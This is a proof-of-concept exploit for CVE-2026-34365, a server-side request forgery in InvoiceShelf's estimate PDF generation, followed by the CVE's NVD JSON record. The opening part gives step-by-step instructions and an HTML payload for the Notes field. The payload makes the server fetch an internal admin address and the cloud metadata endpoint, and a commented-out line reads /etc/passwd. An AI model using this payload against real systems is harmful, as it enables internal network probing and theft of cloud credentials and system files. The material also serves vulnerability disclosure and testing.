CVE-2026-34365

<!-- PoC for CVE-2026-34365 InvoiceShelf SSRF --> <!-- 1. Log in to InvoiceShelf with a high-privilege account --> <!-- 2. Create or Edit an Estimate --> <!-- 3. Insert the following payload into the 'Notes' field --> <!-- 4. Save and click 'Preview PDF' to trigger the request --> <html> <body> <h1>SSRF Test</h1> <!-- Replace with your Burp Collaborator or internal server address --> <img src="http://192.168.1.1:8080/admin" alt="Internal Port Scan"> <img src="http://169.254.169.254/latest/meta-data/" alt="Cloud Metadata"> <!-- Test file read (if file protocol is allowed in Dompdf config) --> <!-- <img src="file:///etc/passwd" alt="File Read"> --> </body> </html>

{"cve": {"id": "CVE-2026-34365", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:29.307", "lastModified": "2026-04-07T15:53:39.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvoiceShelf is an open-source web & mobile app that helps track expenses, payments and create professional invoices and estimates. Prior to version 2.2.0, a Server-Side Request Forgery (SSRF) vulnerability exists in the Estimate PDF generation module. User-supplied HTML in the estimate Notes field is passed unsanitised to the Dompdf rendering library, which will fetch any remote resources referenced in the markup. The vulnerability is exploitable directly via the PDF preview and customer view endpoints regardless of whether automated email attachments are enabled. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceshelf:invoiceshelf:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "DF850775-DE65-40B0-9079-B1ABA4F1F4C9"}]}]}], "references": [{"url": "https://github.com/InvoiceShelf/InvoiceShelf/releases/tag/2.2.0", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-pc5v-8xwc-v9xq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InvoiceShelf/InvoiceShelf/security/advisories/GHSA-pc5v-8xwc-v9xq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}